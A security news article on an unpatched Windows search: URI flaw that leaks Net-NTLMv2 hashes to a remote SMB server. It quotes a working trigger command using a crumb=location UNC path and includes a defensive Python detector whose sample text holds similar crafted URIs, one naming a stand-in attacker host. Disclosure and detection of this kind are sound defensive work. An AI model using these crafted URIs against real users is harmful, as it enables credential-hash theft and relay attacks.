Unpatched Windows search: URI leaks NTLMv2 hashes

An unpatched flaw in Windows’ search: URI handler can force a PC to connect to an attacker SMB server and disclose a user’s Net-NTLMv2 hash; Microsoft declined to patch.

Security researchers at Huntress disclosed an unpatched flaw in Windows’ search: URI handler that can make a PC connect to an attacker-controlled SMB server and disclose the user’s Net-NTLMv2 hash. Huntress reported the issue to Microsoft on April 15, 2026; Microsoft declined to provide a patch.

The vulnerability arises from the search: handler accepting a crumb=location parameter that contains a UNC path. When Windows processes a crafted search: URI, it follows the crumb=location value to the supplied UNC path and attempts NTLM authentication to the remote SMB server. Huntress demonstrated the behavior using a command such as start "" "search:query=test&crumb=location:\\10.0.1.100\\share".
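To give defenders a concrete way to hunt for links of the shape described above in mail, proxy or EDR telemetry, here is an added detection helper (not code from Huntress or Microsoft). It parses search: URIs, decodes any URL encoding, and reports the remote hosts named by crumb=location UNC paths; the sample text and the host attacker.example are constructed for illustration.

```python
# Hypothetical detection helper (not Huntress's or Microsoft's code): flag
# search: URIs whose crumb=location value is a UNC path, e.g. in mail or proxy logs.
import re
from urllib.parse import unquote

# A search: URI embedded in free text (stops at whitespace or quoting).
SEARCH_URI_RE = re.compile(r"""search:[^\s"'<>]+""", re.IGNORECASE)
# "\\host\share..." after the "location:" prefix; captures the remote host.
UNC_RE = re.compile(r"^\\{2,}([^\\/]+)")

def parse_search_uri(uri: str) -> list:
    """Split 'search:k=v&k2=v2' into (key, decoded value) pairs; [] if not search:."""
    if not uri.lower().startswith("search:"):
        return []
    pairs = []
    for part in uri[len("search:"):].split("&"):
        key, _, value = part.partition("=")
        pairs.append((key.strip().lower(), unquote(value)))
    return pairs

def unc_host_from_crumb(crumb: str):
    """Return the host named by a 'location:\\\\host\\share' crumb, else None."""
    label, _, path = crumb.partition(":")
    if label.strip().lower() != "location":
        return None
    match = UNC_RE.match(path.strip())
    return match.group(1) if match else None

def remote_hosts_in_uri(uri: str) -> list:
    """Hosts a search: URI would make the client contact through UNC crumbs."""
    return [host for key, value in parse_search_uri(uri)
            if key == "crumb" and (host := unc_host_from_crumb(value))]

def scan_text(text: str) -> dict:
    """Map each search: URI in text that carries a UNC crumb to its hosts."""
    findings = {}
    for uri in SEARCH_URI_RE.findall(text):
        hosts = remote_hosts_in_uri(uri)
        if hosts:
            findings[uri] = hosts
    return findings

# Constructed sample: a benign link, the plain UNC crumb quoted in the
# article, and a URL-encoded crumb pointing at a made-up host.
SAMPLE = ('href="search:query=report"\n'
          'start "" "search:query=test&crumb=location:\\\\10.0.1.100\\\\share"\n'
          "search:query=x&crumb=location%3A%5C%5Cattacker.example%5Cdocs\n")
```

scan_text(SAMPLE) returns only the two URIs that carry a UNC crumb, mapped to the hosts the client would try to authenticate to; comparing those hosts against known internal file servers separates legitimate search links from ones worth blocking.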

Huntress noted the flaw uses the same NTLM leakage mechanism and has the same prerequisites as a previously patched issue in the Snipping Tool’s ms-screensketch: URI handler, tracked as CVE-2026-33829 and fixed by Microsoft in April 2026. A similar use of a crumb parameter to steal hashes was documented in 2024 under CVE-2023-35636.

Exploitation requires a user to open a crafted link delivered through a web page, email, or another URL source and approve its launch. The attack also depends on the network allowing outbound SMB connections to the attacker-controlled server and on the target environment accepting NTLM authentication without protections such as SMB signing.

When the system attempts authentication to the remote SMB host, it transmits the Net-NTLMv2 hash, which an attacker can capture. Captured hashes can be used in relay attacks to authenticate to other network services as the user and potentially escalate access.

Microsoft responded to the disclosure by stating that “only Important and Critical severity cases meet our bar for servicing.” Huntress assigned a Moderate severity rating to the issue and described it as producing the same Net-NTLMv2 leak as the earlier snipping-tool vulnerability.

In the absence of a vendor patch, Huntress advised defensive measures including blocking outbound SMB traffic on hosts that do not need it (TCP 445 and 139), enabling SMB signing to prevent relay of captured hashes, and disabling NTLM where feasible. Network segmentation and monitoring for unexpected SMB connections can reduce exposure.

The flaw is part of a recurring class of problems where URI handlers accept and forward file or location parameters without sufficient validation. Security teams are reviewing URL handling policies and applying available mitigations while monitoring for related activity.
